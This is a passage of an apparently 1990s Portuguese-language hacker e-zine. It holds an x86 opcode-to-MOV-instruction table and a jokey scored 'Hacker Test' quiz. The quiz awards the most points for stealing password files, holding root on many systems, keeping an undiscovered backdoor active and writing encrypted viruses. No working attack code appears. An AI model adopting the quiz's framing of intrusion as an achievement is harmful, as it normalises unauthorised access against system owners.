$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ Para você entender melhor o significado dos hexadecimais dos progra- mas. Aki vai uma lista de hexas junto com os comandos. HEXA: COMANDO EM ASSEMBLY: B0** = MOV AL, ** B1** = MOV CL, ** B2** = MOV DL, ** B3** = MOV BL, ** B4** = MOV AH, ** B5** = MOV CH, ** B6** = MOV DH, ** B7** = MOV BH, ** B8**$$ = MOV AX, $$** B9**$$ = MOV CX, $$** BA**$$ = MOV DX, $$** BB**$$ = MOV BX, $$** 88C0 = MOV AL, AL 88C1 = MOV CL, AL 88C2 = MOV DL, AL 88C3 = MOV BL, AL 88C4 = MOV AH, AL 88C5 = MOV CH, AL 88C6 = MOV DH, AL 88C7 = MOV BH, AL 88C8 = MOV AL, CL 88C9 = MOV CL, CL 88CA = MOV DL, CL 88CB = MOV BL, CL 88CC = MOV AH, CL 88CD = MOV CH, CL 88CE = MOV DH, CL 88CF = MOV BH, CL 88D0 = MOV AL, DL 88D1 = MOV CL, DL 88D2 = MOV DL, DL 88D3 = MOV BL, DL 88D4 = MOV AH, DL 88D5 = MOV CH, DL 88D6 = MOV DH, DL 88D7 = MOV BH, DL 88D8 = MOV AL, BL 88D9 = MOV CL, BL 88DA = MOV DL, BL 88DB = MOV BL, BL 88DC = MOV AH, BL 88DD = MOV CH, BL 88DE = MOV DH, BL 88DF = MOV BH, BL 88E0 = MOV AL, AH 88E1 = MOV CL, AH 88E2 = MOV DL, AH 88E3 = MOV BL, AH 88E4 = MOV AH, AH 88E5 = MOV CH, AH 88E6 = MOV DH, AH 88E7 = MOV BH, AH 88E8 = MOV AL, CH 88E9 = MOV CL, CH 88EA = MOV DL, CH 88EB = MOV BL, CH 88EC = MOV AH, CH 88ED = MOV CH, CH 88EE = MOV DH, CH 88EF = MOV BH, CH 88F0 = MOV AL, DH 88F1 = MOV CL, DH 88F2 = MOV DL, DH 88F3 = MOV BL, DH 88F4 = MOV AH, DH 88F5 = MOV CH, DH 88F6 = MOV DH, DH 88F7 = MOV BH, DH 88F8 = MOV AL, BH 88F9 = MOV CL, BH 88FA = MOV DL, BH 88FB = MOV BL, BH 88FC = MOV AH, BH 88FD = MOV CH, BH 88FE = MOV DH, BH 88FF = MOV BH, BH 89C0 = MOV AX, AX 89C1 = MOV CX, AX 89C2 = MOV DX, AX 89C3 = MOV BX, AX 89C8 = MOV AX, CX 89C9 = MOV CX, CX 89CA = MOV DX, CX 89CB = MOV BX, CX 89D0 = MOV AX, DX 89D1 = MOV CX, DX 89D2 = MOV DX, DX 89D3 = MOV BX, DX 89D8 = MOV AX, BX 89D9 = MOV CX, BX 89DA = MOV DX, BX 89DB = MOV BX, BX 90 = NOP =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Fim da lista (parte 1) -=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-= $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 10. Hack, the Art $$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Hacker Test -=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-=-=-==--=- ¡Atenção! Este teste está arrecem na primeira parte por isso o resul- tado pode não estar muito certo. Não se emocione! 01. Quantas horas por dia vc jah passou na frente do computador? A) 4 ou mais B) 8 ou mais C) 16 ou mais 02. Ateh que horas +/- vc ficou acordado na frente do computador? A) ateh a meia noite B) ateh as 4 C) virou a noite(8 ou +) 03. Que sistema operacional vc jah instalou? A) MS-DOS B) Windows C) UNIX (Linux, SunOS, Ultrix,..qquer um..) 04. Ateh que ponto jah mexeu na BIOS do seu computador? A) nunca mexi. B) Trocar a ordem do boot e poucas outras coisas. C) Entendo tudo(ou quase tudo) da bios e sei alterar qquer coisa. 05. Você jah operou algum sistema UNIX? A) Nem sei o que é isso. B) Não C) Sim 06. Você sabe programar um modem? A) não B) só o basico(discar, responder chamadas, mudar o som,...) C) Tenho uma base de todos os comandos. 07. Quantas linguagens de programação vc sabe? A) nenhuma B) ateh 4 C) mais de 4 08. Sabe programar em Assembly? A) Não B) Um pouquinho C) Sim 09. Sabe programar em C ou C++? A) Não B) Um pouquinho C) Sim 10. Vc entende o hexa de um programa? A) Não. Como vcs conseguem? B) mais ou menos, não todo código C) Consigo tirar todo o código. 11. Você entende o protocolo TCP/IP? A) Não B) Soh o basico(portas, serviços,..) C) Todo o protocolo. 12. Você jah usou estes serviços? A) http B) http, IRC, ftp, e-mail e telnet C) http, IRC, ftp, e-mail, telnet, rlogin, gopher, systat, netstat, finger,.. 13. Vc jah descobriu um bug em.. A) nunca B) em programas C) em sistemas operacionais e/ou Protocolos de conexão 14. Vc jah roubou o passwd? A) nunca B) com shadow C) sim 15. Sabe usar um programa crackeador? A) não B) sim C) fiz um programa crackeador 16. O que vc sabe sobre telefonia? A) Sei discar B) Um pouco basico(puxar extensão, voltagens, ..) C) Bastante. 17. Vc jah foi root de um sistema? A) O que? B) Soh do meu sistema C) De varios sistemas. 18. Você jah fez uma backdoor? A) Não B) sim, mas foi descoberta. C) sim, e continua ativa. 19. Você jah criou um virus? A) Não(é perigoso neh?) B) Sim, um virus simples. C) Sim, um virus encriptado e cheio das mutrecas. 20. Os seguintes nomes são comuns? A) nenhum B) Kevin Mitnick C) Kevin Mitnick e Phiber Optick Pontuação: Cada alternativa que vc marcou A some 1 ponto ao seu score total Cada alternativa que vc marcou B some 2 pontos ao seu score total Cada " " " " C " 3 pontos " " " " Resultado: 20 pontos - Newbie ou Beginer 21 a 40 pontos - Wannabe 41 a 50 pontos - Hacker iniciante 51 a 60 pontos - Hacker ou Cracker -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ By Cheat Struck